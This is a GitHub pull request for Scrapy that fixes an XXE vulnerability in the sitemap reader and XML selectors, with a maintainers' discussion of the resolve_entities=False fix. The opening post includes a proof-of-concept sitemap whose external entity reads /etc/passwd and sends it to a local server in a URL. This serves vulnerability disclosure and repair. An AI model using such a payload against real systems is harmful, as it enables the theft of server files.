Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fixed XXE flaw in sitemap reader #676

Merged
merged 4 commits into from Apr 8, 2014
Merged

Fixed XXE flaw in sitemap reader #676

merged 4 commits into from Apr 8, 2014

Conversation

@csalazar
Copy link
Contributor

@csalazar csalazar commented Apr 1, 2014

The XML reader, used by SitemapSpider to process XML sitemaps, is vulnerable to an XML External Entity (XXE) attack. The code to reproduce the bug is displayed below.

test.py

from scrapy.contrib.spiders import SitemapSpider


class TestSpider(SitemapSpider):
    name = 'test'
    sitemap_urls = ['file:///tmp/malicious_sitemap.xml']

    def parse(self, response):
        pass

malicious_sitemap.xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://127.0.0.1:8000/&xxe;</loc>
  </url>
</urlset>

As result, the contents of /etc/passwd are sent to the server http://127.0.0.1:8000/ as part of the URL path.

@dangra
Copy link
Member

@dangra dangra commented Apr 1, 2014

oooh, seriuos bug! is it the same for scrapy.selector.Selector on XMLResponses?

@kmike
Copy link
Member

@kmike kmike commented Apr 1, 2014

@csalazar
Copy link
Contributor Author

@csalazar csalazar commented Apr 1, 2014

@dangra yes, scrapy.selector.Selector on XMLResponses is vulnerable too.
@kmike that library would be ideal

@dangra
Copy link
Member

@dangra dangra commented Apr 3, 2014

@csalazar are you going to update the PR with fixes for the other Selector?

Do you mind adding a testcase specially for LxmlDocument class?

defusedxml looks good but it may require more work to integrate it, in the other hand resolve_entities=False looks quick enough to be merged soon.


class SafeXMLParser(etree.XMLParser):
def __init__(self, *args, **kwargs):
super(SafeXMLParser, self).__init__(*args, resolve_entities=False, **kwargs)

This comment has been minimized.

@dangra

dangra Apr 4, 2014
Member

I prefer to set resolve_entities using kwargs.setdefault() if this class is meant to be public.

This comment has been minimized.

@csalazar

csalazar Apr 4, 2014
Author Contributor

Yes, that seems better, I've updated the method.

@dangra
Copy link
Member

@dangra dangra commented Apr 4, 2014

LGTM, It deserves a hotfix release

@kmike
Copy link
Member

@kmike kmike commented Apr 5, 2014

Is it expanding entities like &gt; after this change?

@csalazar
Copy link
Contributor Author

@csalazar csalazar commented Apr 5, 2014

No, no entities expanded.

dangra added a commit that referenced this pull request Apr 8, 2014
Fixed XXE flaw in sitemap reader
@dangra dangra merged commit e71b8f2 into scrapy:master Apr 8, 2014
1 check passed
1 check passed
continuous-integration/travis-ci The Travis CI build passed
Details
@kmike
Copy link
Member

@kmike kmike commented Apr 8, 2014

I wonder if we can expand standard entities but disallow custom entities. This change fixes the security issue, so it is good to merge it, but is is backwards incompatible for XML selectors.

@csalazar
Copy link
Contributor Author

@csalazar csalazar commented Apr 9, 2014

Hi @kmike, I think that a valid XML file shows raw version of standard entities and not their html encoding. If you have an example, please paste it since we have to check if it breaks the XML document too.

@kmike
Copy link
Member

@kmike kmike commented Apr 9, 2014

I was asking about predefined XML entities like &gt; or &amp; - e.g. "<?xml version='1.0' encoding='ASCII'?>\n<elem>&gt;</elem>". Just tried it, and they still work fine with resolve_entities=False.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants